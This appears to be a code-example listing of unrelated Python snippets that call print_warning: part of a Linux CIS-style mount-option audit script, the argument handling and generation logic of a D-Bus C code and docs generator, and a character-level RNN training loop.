check_equal("mount | grep /home", "nodev")

#
print_header("1.1.11 Add nodev Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for nodev on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.12 Add noexec Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for noexec on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.13 Add nosuid Option to Removable Media Partitions (Not Scored)")
print_warning("Check manually for nosuid on removable media.")
view_output("cat /etc/fstab")

#
print_header("1.1.14 Add nodev Option to /dev/shm Partition (Scored)")
check_equal("grep /dev/shm /etc/fstab | grep nodev", "nodev")
Example #39
def codegen_main():
    arg_parser = argparse.ArgumentParser(description='D-Bus code and documentation generator')
    arg_parser.add_argument('files', metavar='FILE', nargs='*',
                            help='D-Bus introspection XML file')
    arg_parser.add_argument('--xml-files', metavar='FILE', action='append', default=[],
                            help='D-Bus introspection XML file')
    arg_parser.add_argument('--interface-prefix', metavar='PREFIX', default='',
                            help='String to strip from D-Bus interface names for code and docs')
    arg_parser.add_argument('--c-namespace', metavar='NAMESPACE', default='',
                            help='The namespace to use for generated C code')
    arg_parser.add_argument('--c-generate-object-manager', action='store_true',
                            help='Generate a GDBusObjectManagerClient subclass when generating C code')
    arg_parser.add_argument('--c-generate-autocleanup', choices=['none', 'objects', 'all'], default='objects',
                            help='Generate autocleanup support')
    arg_parser.add_argument('--generate-docbook', metavar='OUTFILES',
                            help='Generate Docbook in OUTFILES-org.Project.IFace.xml')
    arg_parser.add_argument('--pragma-once', action='store_true',
                            help='Use "pragma once" as the inclusion guard')
    arg_parser.add_argument('--annotate', nargs=3, action='append', metavar='WHAT KEY VALUE',
                            help='Add annotation (may be used several times)')

    group = arg_parser.add_mutually_exclusive_group()
    group.add_argument('--generate-c-code', metavar='OUTFILES',
                       help='Generate C code in OUTFILES.[ch]')
    group.add_argument('--header', action='store_true',
                       help='Generate C headers')
    group.add_argument('--body', action='store_true',
                       help='Generate C code')

    group = arg_parser.add_mutually_exclusive_group()
    group.add_argument('--output', metavar='FILE',
                       help='Write output into the specified file')
    group.add_argument('--output-directory', metavar='OUTDIR', default='',
                       help='Location to output generated files')

    args = arg_parser.parse_args()

    if len(args.xml_files) > 0:
        print_warning('The "--xml-files" option is deprecated; use positional arguments instead')

    if ((args.generate_c_code is not None or args.generate_docbook is not None) and
            args.output is not None):
        print_error('Using --generate-c-code or --generate-docbook and '
                    '--output at the same time is not allowed')

    if args.generate_c_code:
        outdir = args.output_directory
        header_name = args.generate_c_code + '.h'
        h_file = os.path.join(outdir, header_name)
        args.header = True
        c_file = os.path.join(outdir, args.generate_c_code + '.c')
        args.body = True
    else:
        if args.output is None:
            print_error('Using --header or --body requires --output')

        if args.header:
            h_file = args.output
            header_name = os.path.basename(h_file)
        elif args.body:
            c_file = args.output
            header_name = os.path.splitext(c_file)[0] + '.h'

    all_ifaces = []
    for fname in args.files + args.xml_files:
        with open(fname, 'rb') as f:
            xml_data = f.read()
        parsed_ifaces = parser.parse_dbus_xml(xml_data)
        all_ifaces.extend(parsed_ifaces)

    if args.annotate is not None:
        apply_annotations(all_ifaces, args.annotate)

    for i in all_ifaces:
        i.post_process(args.interface_prefix, args.c_namespace)

    docbook = args.generate_docbook
    docbook_gen = codegen_docbook.DocbookCodeGenerator(all_ifaces)
    if docbook:
        ret = docbook_gen.generate(docbook, outdir)

    if args.header:
        with open(h_file, 'w') as outfile:
            gen = codegen.HeaderCodeGenerator(all_ifaces,
                                              args.c_namespace,
                                              args.c_generate_object_manager,
                                              args.c_generate_autocleanup,
                                              header_name,
                                              args.pragma_once,
                                              outfile)
            gen.generate()

    if args.body:
        with open(c_file, 'w') as outfile:
            gen = codegen.CodeGenerator(all_ifaces,
                                        args.c_namespace,
                                        args.c_generate_object_manager,
                                        header_name,
                                        docbook_gen,
                                        outfile)
            gen.generate()

    sys.exit(0)
Example #40
        # Create training set from file
        inputs = data[p:p+seq_length]
        targets = data[p+1:p+seq_length+1]

        # Update RNN with data
        loss = RNN.update_rnn(inputs, targets, learning_rate)
        smooth_loss = smooth_loss * 0.999 + loss * 0.001

        # Increment data pointer with wrap-around
        if p+2*seq_length+1 < len(data):
            p += seq_length
        else:
            p = 0
            RNN.reset_state()
            print_warning("[I] Finished pass through file.")
            
        # Show progress
        if n % 250 == 0:
            print "---------------------------------------------"
            st = datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')
            print "[%s] Iteration: \t\t%d" % (st, n)
            print "\t\t   Loss: \t\t\t%7.4f" % smooth_loss
            print "\t\t   Characters Fed:  %d" % p
            print "\t\t   Sample: \n\n"
            print RNN.sample_rnn(data[p], 200)
            print "---------------------------------------------\n\n"

except KeyboardInterrupt:
    print "Halting training"